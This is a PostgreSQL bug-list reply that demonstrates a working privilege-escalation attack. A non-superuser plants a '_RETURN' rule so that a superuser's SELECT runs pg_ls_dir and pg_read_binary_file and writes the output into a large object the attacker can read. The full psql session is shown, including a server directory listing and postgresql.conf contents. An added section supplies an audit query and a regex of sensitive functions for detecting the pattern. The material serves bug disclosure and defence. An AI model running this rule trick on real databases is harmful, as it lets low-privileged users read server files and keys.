Re: BUG #13651: trigger security invoker attack - Mailing list pgsql-bugs
From: 德哥
Subject: Re: BUG #13651: trigger security invoker attack
Msg-id: 6afdf76.718e.1501cb131cf.Coremail.digoal@126.com
In response to: Re: BUG #13651: trigger security invoker attack ("David G. Johnston" <david.g.johnston@gmail.com>)
List: pgsql-bugs
Thanks, there are also other risks in PostgreSQL.
People can use large object functions & rule spoofing.
postgres=> create table v2(id int);
CREATE TABLE
postgres=> select lo_create(1);
lo_create
-----------
1
(1 row)
postgres=> create rule "_RETURN" as on select to v2 do instead select 1 as id from (select lowrite(lo_open(1,131072), con::bytea) from (select string_agg(c,' | ') as con from pg_ls_dir('.') as t(c)) t)t;;
CREATE RULE
postgres=> \c postgres postgres
You are now connected to database "postgres" as user "postgres".
postgres=# select * from v2;
id
----
1
(1 row)
postgres=# \c postgres digoal
postgres=> select convert_from(loread(lo_open(1,262144),1000),'utf8');
convert_from
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
pg_xlog | pg_multixact | base | .s.PGSQL.1922.lock | recovery.done | pg_log | pg_logical | pg_subtrans | backup_label.old | pg_stat_tmp | PG_VERSION | postmaster.opts | tsearch_data | pg_stat | pg_serial |
VITESSE_LICENSE_KEY | pg_notify | postgresql.conf | pg_replslot | pg_tblspc | pg_ident.conf | server.crt | pg_dynshmem | pg_twophase | global | server.key | .s.PGSQL.1922 | .s.PGSQL.1921.lock | .s.PGSQL.1921 |
postmaster.pid | pg_hba.conf | pg_worker_list.conf | pg_clog | postgresql.auto.conf | pg_snapshots
(1 row)
postgres=> select lo_create(2);
lo_create
-----------
2
(1 row)
postgres=> drop view v2;
DROP VIEW
postgres=> create table v2(id int);
CREATE TABLE
postgres=> create rule "_RETURN" as on select to v2 do instead select 1 as id from (select lowrite(lo_open(2,131072), pg_read_binary_file('postgresql.conf'))) t;
CREATE RULE
postgres=> \c postgres postgres
You are now connected to database "postgres" as user "postgres".
postgres=# select * from v2;
id
----
1
(1 row)
postgres=# \c postgres digoal
You are now connected to database "postgres" as user "digoal".
postgres=> select convert_from(loread(lo_open(2,262144),100000),'utf8');
convert_from
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# ----------------------------- +
# PostgreSQL configuration file +
# ----------------------------- +
# +
# This file consists of lines of the form: +
# +
# name = value +
# +
# (The "=" is optional.) Whitespace may be used. Comments are introduced with +
# "#" anywhere on a line. The complete list of parameter names and allowed +
# values can be found in the PostgreSQL documentation. +
# +
# The commented-out settings shown in this file represent the default values. +
# Re-commenting a setting is NOT sufficient to revert it to the default value; +
# you need to reload the server. +
# +
# This file is read on server startup and when the server receives a SIGHUP +
# signal. If you edit the file on a running system, you have to SIGHUP the +
# server for the changes to take effect, or use "pg_ctl reload". Some +
# parameters, which are marked below, require a server shutdown and restart to +
......
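An audit query a DBA can run to spot the pattern shown above (DO INSTEAD rules on relations owned by non-superusers whose definition calls large-object or server-file functions). This is an added example, not code from the original thread; the function list in the regex is an assumption and should be extended to whatever functions are considered sensitive on a given installation.

```sql
-- Added audit query (not from the original thread).
-- Lists DO INSTEAD rules (including the "_RETURN" rule that turns a table
-- into a view) on relations NOT owned by a superuser, whose rule text
-- references large-object or server-file functions. A superuser who runs
-- SELECT on such a relation executes those calls with superuser rights.
SELECT n.nspname                  AS schema_name,
       c.relname                  AS relation_name,
       r.rulename,
       pg_get_userbyid(c.relowner) AS owner,
       pg_get_ruledef(r.oid)      AS rule_definition
FROM   pg_rewrite   r
JOIN   pg_class     c ON c.oid = r.ev_class
JOIN   pg_namespace n ON n.oid = c.relnamespace
JOIN   pg_roles     o ON o.oid = c.relowner
WHERE  r.is_instead
  AND  NOT o.rolsuper
  AND  n.nspname NOT IN ('pg_catalog', 'information_schema')
  -- \m and \M are PostgreSQL word-boundary anchors; the list is an assumption
  AND  pg_get_ruledef(r.oid) ~*
       '\m(lo_open|lowrite|loread|lo_import|lo_export|lo_put|lo_get|pg_read_file|pg_read_binary_file|pg_ls_dir)\M'
ORDER  BY 1, 2, 3;
```

Any row returned is a relation a superuser should not query without first reviewing the rule (or querying it under a less-privileged role via SET ROLE).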